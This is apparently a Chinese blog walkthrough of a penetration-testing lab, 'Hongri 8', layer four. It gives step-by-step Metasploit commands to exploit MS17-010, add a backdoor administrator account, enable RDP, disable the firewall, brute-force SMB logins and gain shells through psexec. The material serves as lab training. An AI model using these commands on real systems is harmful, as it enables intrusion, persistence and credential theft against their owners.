首页 > 其他分享 >红日8第四层(两台)

红日8第四层(两台)

时间:2024-04-05 11:30:20浏览次数:18  
标签:红日 use set run 192.168 20.11 第四层 smb 两台

第四层(DC)  20.11.11.129 +一个nat网卡对外访问的192.168.75.136(前面扫描到这个是windows-server2012)

在第三层过来时记得加上网段然后就可以用nmap扫描发现了 135,445,139等端口,漏洞扫描发现了ms17_010


用模块扫描一下发现了真的有ms17_010

use 0  到use 1 都不行(怀疑有那个防火墙)
use 2可以执行 命令执行

use auxiliary/admin/smb/ms17_010_command 
set rhost 20.11.11.129
set command  net user      (尝试一下看用户)
run

set command net user zgx620 zgx@620  /add   (添加用户)
run  

set  command net localgroup administrators  zgx620  /add  (添加到管理组)
run

set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'    (开3389端)

set command netsh advfirewall set allprofiles state off #关闭防火墙  (这个关掉才可以永恒之蓝use 1成功)

use 1
set  rhosts 20.11.11.129
set lhost 192.168.75.131
run(成功)

use 0
set  rhosts 20.11.11.129
set lhost 192.168.75.131
run(成功)

第二种
如果想尝试远程就得去计算机里面把那个只允许同网段的连接关掉,才可以远程
rdesktop    20.11.11.129

第三种用

use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 20.11.11.129
set smbuser /roo/Desktop/a.txt
run可以            (可以跑出密码) (用字典去跑,可能会跑很久)

 用smb凭证攻击试试
use exploit/windows/smb/psexec
set smbuser   zgx620
set smbpass  zgx@620
set rhosts 192.168.75.136
set lhost 192.168.75.131         (可以得到权限)这个也是需要那个nat网卡才可以成功(这个是我添加的用命令执行)

第四层第二台pc 20.11.11.131+nat外网192.168.75.138


用那个fscan扫描发现这个是windows 8.1  x86 32位 开放135,139,445端口
可以尝试永恒之蓝 ,kerberos域渗透
后面用nmap ,跟永恒之蓝模块扫描发现有ms17_010的漏洞
使用 use0,use1,use2都不行

尝试域渗透kerberos 发现可以生成高凭证可以注入但是有一个问题那个20.11.11.129(DC执行但是20.11.11.131不行)

最后用那个smb凭证尝试

use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt   (这个用字典跑,一般管理员都是对应的adminstrator所以猜测)
set rhosts 20.11.11.131
set smbuser adminstrator
run可以 
(账号密码是 administrator    admin@123) 

 
use exploit/windows/smb/psexec
set smbuser   administrator
set smbpass  admin@123
set rhosts 20.11.11.131
set lhost 192.168.75.131
set SMB::AlwaysEncrypt false    
set SMB::ProtocolVersion 1
(因为这个是32位的所以不能加上x64) 可以得到权限

(这两个是针对Exploit failed [disconnected]: RubySMB::Error::EncryptionError Communication error with the remote host: An error occurred reading from the Socket Connection reset by peer. The server supports encryption but was not able to handle the encrypted request.)那两个smb


(注意这台有问题需要把防火墙关掉否则ping不通但是又是黑盒测试不知道密码,用那个刷机软件去刷一下可以自己设置密码在桌面上面)
这个是刷机的东西针对windows

标签:红日,use,set,run,192.168,20.11,第四层,smb,两台
From: https://blog.csdn.net/weixin_62915924/article/details/137396252

相关文章

  • 红日靶场01多角度打靶笔记
    红日靶场01这个笔记主要是利用这个靶场环境,对内网渗透的思路进行整合一下,因此过程中会涉及多个攻击方式和思路。环境搭建windows7是靶机01Windowsserver2008R2是靶机02Windowsserver2003是靶机03Windows10是攻击01kali是攻击02(cs服务端和msf都在上面)这个靶......
  • 通过配置蓝牙串口实现两台电脑之间的无线通信
    确认电脑具备蓝牙功能1、添加蓝牙设备  当蓝牙功能处于开启状态下,按照图中步骤添加蓝牙设备   2、与设备配对连接选中需要连接的设备进行匹配,设备名称需要自行分辨。 配对成功后会有如下提示,点击关闭。   3、配置蓝牙通信返回添加设备页面,滚轮下滑,找到......
  • 记录一次两台电脑vmware中的虚拟机互相访问学习经过
    装过VMware的都知道,VMware有四种网络选择,桥接,主机,和nat,平时都是会使用vmnet8作为网络。因为桥接会使用和宿主机同一个网络,估计会在路由器中注册自己的ip地址。nat模式是网关和dhcp服务交给了虚拟的一个VMnet8网卡,网卡接口为.1出现在宿主机路由表,.2的网关,dhcp随机找一个网段和范围,......
  • Python语言实现两台计算机用TCP协议跨局域网通信
    成果展示:(这张图是在我本地电脑上用pycharm运行两个程序测试,实际可以在两台电脑上分别运行。)设备要求和实现的功能:实现的功能:跨局域网通信(仅支持两台计算机)跨局域网收发小文件,支持缓存在服务器,再一键接收(仅支持两台计算机)使用方法:在服务器上运行server.py程序,在两台客户......
  • 两台服务器千兆,交换机也是千兆,可是传输只有100mbps?
    如果您的服务器和交换机都支持千兆传输速度,但实际传输速度只有100mbps,可能有以下几个原因:网络电缆问题:请确保使用的网线是千兆以太网(GigabitEthernet)标准的,并且没有损坏或松动。有时,低质量或老化的网线可能无法支持千兆传输速度。网络适配器设置问题:确保服务器上的网络适配器已正......
  • 两台电脑在相同网络下使用共享文件夹进行文件的传递
    如题,如何使用共享文件夹,实现两台电脑的文件传递。首先要保证两台电脑处于同一网络下(同一WIFI下)例如电脑A上有个share_file文件夹,我们的目的是,将其变成两台电脑共享的文件夹。电脑A和B都可以对其进行文件的增删改查。电脑A的操作: 右键点击文件夹,选择属性,出现对话框后点击共......
  • 两台笔记本电脑实现同一wifi下访问虚拟主机的WEB服务
    在同一WiFi可以实现两台笔记本设备互相访问共享文件。那一台笔记本如何访问另一台笔记本里的虚拟机里的Web服务呢?客户端A,访问服务端B上的虚拟机C,web服务端口:80001首先,确保服务端B可以正常访问虚拟机C的web服务,可参考:解决Linux(虚拟机VMware)无法联网/静态ip设置(附有li......
  • 两台实体机器4个虚拟机节点的Hadoop集群搭建(Ubuntu版)
    安装UbuntuLinux元信息两台机器,每台机器两台UbuntuUbuntu版本:ubuntu-22.04.3-desktop-amd64.iso处理器数量2,每个处理器的核心数量2,总处理器核心数量4单个虚拟机内存8192MB(8G),最大磁盘大小30G参考链接清华大学开源软件镜像站https://mirrors.tuna.tsinghua.edu.cn/ubunt......
  • 两台电脑如何共享文件?
    步骤1:确保网络连接正常两台电脑之间如果要进行文件的共享,首先要确保在开始共享文件之前,两台电脑都已连接到同一个网络。我们可以先对WiFi或有线连接进行设置,确保电脑之间可以相互通信。步骤2:启用共享功能电脑怎么共享文件?连接好网络之后,我们可以启用共享功能,操作步骤如......
  • 红日靶场2
    靶场环境攻击机器:192.168.142.133(模拟外网)PC机器:192.168.142.210(模拟外网)、192.168.140.210(模拟内网)WEB机器:192.168.142.230(模拟外网)、192.168.140.230(模拟内网)DC机器:192.168.140.220(模拟内网)(1)通过arp-scan命令探测存活主机arp-scan-l(2)发现存在192.168.142.210、192.168......